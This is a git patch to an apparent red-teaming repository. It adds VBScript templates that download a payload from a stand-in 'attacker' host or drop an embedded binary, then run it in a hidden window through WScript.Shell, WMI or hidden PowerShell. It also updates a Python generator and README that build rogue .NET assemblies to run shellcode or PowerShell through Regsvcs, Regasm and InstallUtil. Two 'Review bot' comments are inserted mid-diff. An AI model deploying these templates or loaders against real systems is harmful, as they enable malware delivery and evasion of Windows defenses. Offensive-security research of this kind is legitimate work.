From 8b03b5ba409aa4d2e8fd8619758d2e562e883cd0 Mon Sep 17 00:00:00 2001
From: mgeeky
Date: Thu, 7 May 2020 01:42:52 +0200
Subject: [PATCH] Added code-exec-templates and some additions to rogue-dot-net
---
 linux/toggleWaf.sh | 78 +-
 red-teaming/code-exec-templates/README.md | 136 +--
 .../download-file-and-exec.vbs | 72 +-
 ...download-powershell-and-exec-via-stdin.vbs | 34 +
 .../drop-binary-file-and-launch.vbs | 47 ++
 .../hello-world-jscript-xslt.xsl | 28 +-
 .../code-exec-templates/wmi-exec-command.vbs | 38 +-
 .../wscript-shell-code-exec.vbs | 26 +-
 .../wscript-shell-run-jscript-scriptlet.sct | 28 +-
 .../wscript-shell-run-jscript-xslt.xsl | 26 +-
 .../wscript-shell-run-vbscript.hta | 26 +-
 .../wscript-shell-stdin-code-exec.vbs | 38 +-
 red-teaming/rogue-dot-net/README.md | 178 ++--
 .../rogue-dot-net/generateRogueDotNet.py | 774 +++++++++--------
 14 files changed, 806 insertions(+), 723 deletions(-)
 create mode 100644 red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs
 create mode 100644 red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs
diff --git a/linux/toggleWaf.sh b/linux/toggleWaf.sh
index 0b549f7..3600c3f 100644
--- a/linux/toggleWaf.sh
+++ b/linux/toggleWaf.sh
@@ -1,39 +1,39 @@
-#!/bin/bash
-
-modname=security2
-friendlyname=WAF
-
-if [ $# -ne 1 ]; then
- echo "Usage: ./toggleWaf "
- exit 1
-fi
-
-case $1 in
- "on")
- if [ $EUID -ne 0 ]; then
- echo "[!] This function must be run as root. Use sudo."
- exit 1
- fi
- a2enmod $modname > /dev/null
- systemctl reload apache2
- echo "[+] $friendlyname enabled."
- ;;
-
- "off")
- if [ $EUID -ne 0 ]; then
- echo "[!] This function must be run as root. Use sudo."
- exit 1
- fi
- a2dismod $modname > /dev/null
- systemctl reload apache2
- echo "[-] $friendlyname disabled."
- ;;
-
- "status")
- if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
- echo "[+] $friendlyname is enabled."
- else
- echo "[-] $friendlyname is disabled."
- fi
- ;;
-esac
+#!/bin/bash
+
+modname=security2
+friendlyname=WAF
+
+if [ $# -ne 1 ]; then
+ echo "Usage: ./toggleWaf "
+ exit 1
+fi
+
+case $1 in
+ "on")
+ if [ $EUID -ne 0 ]; then
+ echo "[!] This function must be run as root. Use sudo."
+ exit 1
+ fi
+ a2enmod $modname > /dev/null
+ systemctl reload apache2
+ echo "[+] $friendlyname enabled."
+ ;;
+
+ "off")
+ if [ $EUID -ne 0 ]; then
+ echo "[!] This function must be run as root. Use sudo."
+ exit 1
+ fi
+ a2dismod $modname > /dev/null
+ systemctl reload apache2
+ echo "[-] $friendlyname disabled."
+ ;;
+
+ "status")
+ if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
+ echo "[+] $friendlyname is enabled."
+ else
+ echo "[-] $friendlyname is disabled."
+ fi
+ ;;
+esac
diff --git a/red-teaming/code-exec-templates/README.md b/red-teaming/code-exec-templates/README.md
index b960788..bb19d52 100644
--- a/red-teaming/code-exec-templates/README.md
+++ b/red-teaming/code-exec-templates/README.md
@@ -1,67 +1,71 @@ -### A small collection of unobfuscated code-execution primitives in different languages - -A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. - -Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: - -- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** - -- `wscript.exe` - For general scripts execution. **This one loads AMSI** - - ---- - -#### VBScript - -- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` - -- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` - -- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. - -- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` - - ---- - -#### JScript - - ---- - -#### XSL - -XSL files can be executed in the following ways: - -- Using `wmic.exe`: -``` -wmic os get /format:"jscript-xslt-template.xsl" -``` - -Templates: - -- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. 
- -- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method - - - ---- - -#### COM Scriptlets - -Sample code execution with `regsvr32` can be following: -``` -regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll -``` - -- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` - - ---- - -#### HTA - -HTA files are HTML Applications - +### A small collection of unobfuscated code-execution primitives in different languages + +A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one. + +Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters: + +- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI** + +- `wscript.exe` - For general scripts execution. **This one loads AMSI** + + +--- + +#### VBScript + +- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run` + +- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn` + +- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it. + +- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create` + +- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window. 
+ +- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell` + + +--- + +#### JScript + + +--- + +#### XSL + +XSL files can be executed in the following ways: + +- Using `wmic.exe`: +``` +wmic os get /format:"jscript-xslt-template.xsl" +``` + +Templates: + +- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box. + +- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method + + + +--- + +#### COM Scriptlets + +Sample code execution with `regsvr32` can be following: +``` +regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll +``` + +- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run` + + +--- + +#### HTA + +HTA files are HTML Applications + - **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ \ No newline at end of file diff --git a/red-teaming/code-exec-templates/download-file-and-exec.vbs b/red-teaming/code-exec-templates/download-file-and-exec.vbs index e20366f..3f9ae67 100644 --- a/red-teaming/code-exec-templates/download-file-and-exec.vbs +++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs 
@@ -1,38 +1,36 @@
-'
-' Example of downloading a binary file from the URL, saving it to the
-' local filesystem and then launching.
-'
-' Mariusz B. / mgeeky,
-' (https://github.com/mgeeky)
-'
-
-downloadURL = "http://attacker/payload.exe"
-saveAs = "%TEMP%\foo.exe"
-parameters = ""
-
-Dim sh: Set sh = CreateObject("WScript.Shell")
-out = sh.ExpandEnvironmentStrings(saveAs)
-
-' STEP 1: Download File
-Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
-xhr.Open "GET", downloadURL, False
-xhr.Send
-
-' STEP 2: Save binary file
-If xhr.Status = 200 Then
- With CreateObject("Adodb.Stream")
- .Open
- .Type = 1
- .write xhr.responseBody
- .savetofile out, 2
- End With
-
- ' STEP 3: Execute file
- cmd = out & " " & parameters
- MsgBox cmd
- sh.Run cmd, 0, False
-
-End If
-
-Set sh = Nothing
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky,
+' (https://github.com/mgeeky)
+'
+
+downloadURL = "http://attacker/payload.exe"
+saveAs = "%TEMP%\foo.exe"
+parameters = ""
+
+Dim sh: Set sh = CreateObject("WScript.Shell")
+out = sh.ExpandEnvironmentStrings(saveAs)
+
+' STEP 1: Download File
+Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
+xhr.Open "GET", downloadURL, False
+xhr.Send
+
+' STEP 2: Save binary file
+If xhr.Status = 200 Then
+ With CreateObject("Adodb.Stream")
+ .Open
+ .Type = 1
+ .write xhr.responseBody
+ .savetofile out, 2
+ End With
+
+ ' STEP 3: Execute file
+ cmd = out & " " & parameters
+ sh.Run cmd, 0, False
+End If
+
+Set sh = Nothing
 Set xhr = Nothing
\ No newline at end of file
diff --git a/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs
new file mode 100644
index 0000000..e333bd7
--- /dev/null
+++ b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs
@@ -0,0 +1,34 @@
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky,
+' (https://github.com/mgeeky)
+'
+
+scriptURL = "http://attacker/script.ps1"
+launcher = "powershell -nop -w hid -Command -"
+
+Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
+xhr.Open "GET", scriptURL, False
+xhr.Send
+
+Function bin2a(Binary)
+ Dim I,S
+ For I = 1 to LenB(Binary)
+ S = S & Chr(AscB(MidB(Binary,I,1)))
+ Next
+ bin2a = S
+End Function
+
+If xhr.Status = 200 Then
+ With CreateObject("WScript.Shell")
+ With .Exec(launcher)
+ .StdIn.WriteLine bin2a(xhr.responseBody)
+ .StdIn.WriteBlankLines 1
+ .Terminate
+ End With
+ End With
+End If
+
+Set xhr = Nothing
\ No newline at end of file
diff --git a/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs
new file mode 100644
index 0000000..9abe02a
--- /dev/null
+++ b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs
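Review bot: The header comment of download-powershell-and-exec-via-stdin.vbs is copied from download-file-and-exec.vbs and describes downloading a binary, saving it to disk and launching it, which is not what this file does: it fetches scriptURL with MSXML2.XMLHTTP and writes the response body to the StdIn of the `launcher` process. Replace the first three header lines with `' Example of downloading a PowerShell script from the URL and passing it to powershell.exe via StdIn.`. `bin2a` is undocumented as well; a one-liner above `Function bin2a(Binary)` such as `' Converts the byte-array response body into a VBScript string, one character per byte.` states what the helper does. The README hunk in this commit lists the file as `download-powershell-and-exec-via-stdin` without the `.vbs` suffix the neighbouring entries carry.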
@@ -0,0 +1,47 @@ +' +' Example of dropping an embedded, base64 encoded binary file to the disk, +' decoding it and then launching. +' +' Mariusz B. / mgeeky, +' (https://github.com/mgeeky) +' + +saveFileAs = "%TEMP%\foo.exe" +launchParameters = "" + +' ============================================================= + +fileBuffer = "" + +' ============================================================= + +Function Base64Decode(ByVal vCode) + Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") + oNode.dataType = "bin.base64" + oNode.text = vCode + Base64Decode = oNode.nodeTypedValue + Set oNode = Nothing +End Function + +Dim sh: Set sh = CreateObject("WScript.Shell") +out = sh.ExpandEnvironmentStrings(saveFileAs) + +With CreateObject("Adodb.Stream") + .Open + .Type = 1 + .write Base64Decode(fileBuffer) + .savetofile out, 2 +End With + +computer = "." +Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ + & computer & "\root\cimv2") + +Set startup = wmi.Get("Win32_ProcessStartup") +Set conf = startup.SpawnInstance_ +conf.ShowWindow = 12 + +Set proc = GetObject("winmgmts:root\cimv2:Win32_Process") + +command = out & " " & launchParameters +proc.Create command, Null, conf, intProcessID \ No newline at end of file diff --git a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl index a483e85..e4e5766 100644 --- a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl +++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl @@ -1,15 +1,15 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wmi-exec-command.vbs b/red-teaming/code-exec-templates/wmi-exec-command.vbs index e917727..ff57376 100644 --- a/red-teaming/code-exec-templates/wmi-exec-command.vbs +++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs 
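Review bot: `fileBuffer = ""` between the two `' ====` separators in drop-binary-file-and-launch.vbs is the slot the template expects to be filled with the base64-encoded file contents, but nothing in the file says so; a comment above that line such as `' Base64-encoded contents of the file to drop; intentionally empty in the template.` makes the placeholder explicit. The WMI launch block at the end (`Win32_ProcessStartup`, `conf.ShowWindow = 12`, `Win32_Process.Create`) is duplicated from wmi-exec-command.vbs, whose header explains that `ShowWindow = 12` means a hidden window, while this file's header does not — either carry that one-line explanation over to `conf.ShowWindow = 12` or note in the header that the launch part mirrors wmi-exec-command.vbs.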
@@ -1,20 +1,20 @@
-'
-' This script uses WMI class' Win32_Process static method Create to
-' execute given command in a hidden window (ShowWindow = 12).
-'
-' Mariusz B. / mgeeky,
-' (https://github.com/mgeeky)
-'
-
-command = "notepad.exe"
-computer = "."
-
-Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
- & computer & "\root\cimv2")
-
-Set startup = wmi.Get("Win32_ProcessStartup")
-Set conf = startup.SpawnInstance_
-conf.ShowWindow = 12
-
-Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
+'
+' This script uses WMI class' Win32_Process static method Create to
+' execute given command in a hidden window (ShowWindow = 12).
+'
+' Mariusz B. / mgeeky,
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+computer = "."
+
+Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
+ & computer & "\root\cimv2")
+
+Set startup = wmi.Get("Win32_ProcessStartup")
+Set conf = startup.SpawnInstance_
+conf.ShowWindow = 12
+
+Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
 proc.Create command, Null, conf, intProcessID
\ No newline at end of file
diff --git a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
index f6c3d00..870257e 100644
--- a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
+++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
@@ -1,13 +1,13 @@
-'
-' This script uses classic WScript.Shell Run method to
-' execute given command in a hidden window (second param = 0)
-'
-' Mariusz B. / mgeeky,
-' (https://github.com/mgeeky)
-'
-
-command = "notepad.exe"
-
-With CreateObject("WScript.Shell")
- .Run command, 0, False
-End With
+'
+' This script uses classic WScript.Shell Run method to
+' execute given command in a hidden window (second param = 0)
+'
+' Mariusz B. / mgeeky,
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+
+With CreateObject("WScript.Shell")
+ .Run command, 0, False
+End With
diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct index afcdbfe..892392f 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct @@ -1,15 +1,15 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl index 04c017c..7f58813 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl +++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl @@ -1,14 +1,14 @@ - - - - - + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta index e946d45..42b55bd 100644 --- a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta +++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta @@ -1,14 +1,14 @@ - - - - - - + + + + + + \ No newline at end of file diff --git a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs index c1bb438..8264bcb 100644 --- a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs +++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs 
@@ -1,19 +1,19 @@
-'
-' This script uses classic WScript.Shell Exec method to
-' execute given command in a hidden window via StdIn passed to a dedicated
-' launcher command (powershell.exe in this example).
-'
-' Mariusz B. / mgeeky,
-' (https://github.com/mgeeky)
-'
-
-command = "notepad.exe"
-launcher = "powershell -nop -w hid -Command -"
-
-With CreateObject("WScript.Shell")
- With .Exec(launcher)
- .StdIn.WriteLine command
- .StdIn.WriteBlankLines 1
- .Terminate
- End With
-End With
+'
+' This script uses classic WScript.Shell Exec method to
+' execute given command in a hidden window via StdIn passed to a dedicated
+' launcher command (powershell.exe in this example).
+'
+' Mariusz B. / mgeeky,
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+launcher = "powershell -nop -w hid -Command -"
+
+With CreateObject("WScript.Shell")
+ With .Exec(launcher)
+ .StdIn.WriteLine command
+ .StdIn.WriteBlankLines 1
+ .Terminate
+ End With
+End With
diff --git a/red-teaming/rogue-dot-net/README.md b/red-teaming/rogue-dot-net/README.md
index 1b7d9b4..02ce5b5 100644
--- a/red-teaming/rogue-dot-net/README.md
+++ b/red-teaming/rogue-dot-net/README.md
@@ -1,90 +1,90 @@ -## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution - -Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: - -- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) -- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) -- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) - -### Step 1: Generate key.snk file - -``` -powershell -file build.ps1 -``` - -### Step 2: Generate source code file - -Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. - -Usage: - -``` -python3 generateRogueDotNet.py --help - - :: Rogue .NET Source Code Generation Utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, - -usage: .\generateRogueDotNet.py [options] - -positional arguments: - inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. - -optional arguments: - -h, --help show this help message and exit - -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! - -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -``` - -Sample use case: - -``` -python3 generateRogueDotNet.py -r notepad64.bin > program.cs - - :: Rogue .NET Source Code Generation Utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, - -[?] File specified as raw Shellcode. 
- -``` - - -### Step 3: Compilate library .NET Assembly - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -``` - -If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: - -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -``` - - -### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: - -- x86: -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -``` - -- x64: -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll - -%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution + +Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: + +- 
[Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) +- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) +- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) + +### Step 1: Generate key.snk file + +``` +powershell -file build.ps1 +``` + +### Step 2: Generate source code file + +Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. + +Usage: + +``` +python3 generateRogueDotNet.py --help + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +usage: .\generateRogueDotNet.py [options] + +positional arguments: + inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. + +optional arguments: + -h, --help show this help message and exit + -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! + -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. +``` + +Sample use case: + +``` +python3 generateRogueDotNet.py -r notepad64.bin > program.cs + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +[?] File specified as raw Shellcode. 
+ +``` + + +### Step 3: Compilate library .NET Assembly + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + +If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: + +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + + +### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: + +- x86: +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` + +- x64: +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll ``` \ No newline at end of file diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py index f78d3f8..58b3fe5 100644 --- a/red-teaming/rogue-dot-net/generateRogueDotNet.py 
+++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py 
@@ -1,387 +1,387 @@ -#!/usr/bin/python3 -# -# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. -# -# Step 1: Generate source code file -# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs -# -# Step 2: Compilate library .NET Assembly -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -# -# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used -# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). -# Then proper compilation command will be: -# -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs -# -# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: -# x86: -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# x64: -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll - -# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# cmd> 
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# -# Mariusz B. / mgeeky, -# - -import re -import os -import io -import sys -import gzip -import base64 -import string -import struct -import random -import binascii -import argparse - - -def getCompressedPayload(filePath): - out = io.BytesIO() - encoded = '' - with open(filePath, 'rb') as f: - inp = f.read() - - with gzip.GzipFile(fileobj = out, mode = 'w') as fo: - fo.write(inp) - - encoded = base64.b64encode(out.getvalue()) - - powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( - encoded.decode() - ) - return powershell - -def getSourceFileContents(payload, _format): - launchCode = '' - usings = '' - - if _format == 'exe': - - exeLaunchCode = string.Template(''' - public static void Execute() { - - string payload = "$payload2"; - byte[] decoded = System.Convert.FromBase64String(payload); - - Assembly asm = Assembly.Load(decoded); - MethodInfo method = asm.EntryPoint; - object instance = asm.CreateInstance(method.Name); - method.Invoke(instance, null); - - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - - launchCode = exeLaunchCode - - elif _format == 'raw': - - foo = str(binascii.hexlify(payload), 'ascii') - fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] - encodedPayload = ' ' - - for i in range(len(fooarr)): - if i % 16 == 0 and i > 0: - encodedPayload += '\n ' - encodedPayload += '{}, '.format(fooarr[i]) - - encodedPayload = encodedPayload.strip()[:-1] - - shellcodeLoader = string.Template(''' - [DllImport("kernel32")] - private static extern IntPtr VirtualAlloc( - IntPtr lpAddress, UIntPtr dwSize, - UInt32 flAllocationType, - UInt32 flProtect - ); - - [DllImport("kernel32")] - private static extern bool VirtualFree( - 
